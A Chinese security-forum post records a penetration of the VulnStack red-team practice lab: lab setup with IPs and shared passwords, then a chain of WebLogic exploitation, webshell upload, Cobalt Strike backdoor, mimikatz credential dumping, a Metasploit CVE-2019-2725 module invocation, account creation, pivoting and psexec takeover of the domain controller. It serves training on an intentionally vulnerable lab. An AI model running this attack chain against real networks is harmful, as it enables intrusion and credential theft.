安全矩阵

 找回密码
 立即注册
搜索
查看: 7659|回复: 0

ATT&CK红队评估二套靶场渗透记录

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-12-24 08:07:28 | 显示全部楼层 |阅读模式
原文链接:ATT&CK红队评估二套靶场渗透记录


前言:
开源靶场VulnStack是由国内红日安全团队打造一个靶场知识平台。靶场设计思路来源ATT&CK红队评估模式,从漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场。最近正在学习内网知识,这一套靶场还是很有针对性的,可以拿来练手。本次针对第二套靶场进行搭建、环境配置,以及根据渗透测试流程进行渗透,从web应用程序到内网拿下主机,将整个渗透过程记录下来分享给大家。



环境搭建

1.1 网络拓扑图构建



1.2 IP配置
机器类型
操作系统
内网IP
外网IP
开机账户密码
攻击机
Kali Linux

192.168.85.139

WEB服务器
Win server  2008
192.168.163.101
192.168.85.201
de1ay/1qaz@WSX
PC机
Win 7
192.168.163.100
192.168.85.200
de1ay/1qaz@WSX
DC域控服务器
Win server  2012
192.168.163.10

de1ay/1qaz@WSX

攻击机:kali LinuxNAT模式
192.168.85.139(外)
**************************************
(开机默认密码:1qaz@WSX)

WEB服务器:Windows server 2008 NAT模式+仅主机模式(需要以用户de1aly登录,本地登录时账户administrator没有密码,需要重新创建密码1qaz@WSX)
NAT模式:192.168.85.201(外)
仅主机模式:192.168.163.101(内)
PC机:Windows 7 NAT模式+仅主机模式
NAT模式:192.168.85.200(外)
仅主机模式:192.168.163.100(内)
DC域控服务器:Windows server 2012 仅主机模式
192.168.163.10(内)



相关配置

2.1 攻击机:kali Linux


先从WEB机开始,注意需要手动开启服务,路径如下:
C:\Oracle\Middleware\user_projects\domains\base_domain\bin下有一个startWeblogic的批处理,管理员身份运行它即可,管理员账号密码:Administrator/1qaz@WSX

2.2 WEB机和PC机:
计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动(Computer Browser 一直自动关闭导致 net view 显示 6118 error 没能解决,在域信息收集时暂时关闭一下防火墙)

2.3 Web服务器:Windowsserver 2008


开机后启动360防护软件。
手动开启Computer Browser、Server、Workstation等服务



2.4 PC机:Windows 7



开机后启动360防护软件。
手动开启Computer Browser、Server、Workstation服务。

2.5 DC域控服务器:Windowsserver 2012



渗透过程记录

3.1 信息收集(注:本次渗透是分段多次进行的,所以可能存在IP变化)
已知web服务器ip地址:192.168.85.201

Nmap扫描主机端口:

主机开放了7001端口,提供Oracle weblogic服务

用工具检测weblogic漏洞,发现后台路径以及一个SSRF漏洞和两个CVE漏洞。


3.2 验证:
1)后台


2)SSRF



3)上传冰蝎马


4)冰蝎连接:

5)cs后门


6)mimikatz抓取密码


现在基本可以确定:
存在域:DE1AY
密码基本都是:1qaz@WSX



3.3  利用msf打cve
CVE-2019-2725
useexploit/multi/misc/weblogic_deserialize_asyncresponseservice
setrhost 目标IP
setlhost 攻击机IP
settarget 1 #指定靶机是Windows

run


查看开放的端口


添加账户


远程登录+获取域控制器的IP


挂代理,扫内网
设置路由


查看ARP缓存


拿下域控制器
因为之前拿下那台主机里面有个de1ay账户好像有域管理权限知道密码,可以远程桌面登录看看,发现果然是域管理权限,能连上域控制器


然后直接使用psexec连接域控制器拿下域控


利用msf生成一个正向shell马,然后使用copy命令上传,然后拿下域控制器


拿下了域控制器,自然之前横向没有拿到的win7主机也变成了囊中之物,最后整个域所有主机的shell如下图所示:


至此,本期渗透记录完成,欢迎交流。
原创不易,如果您觉得不错,动动发财的小手指,点个赞,转发分享

















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:38 , Processed in 0.013652 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表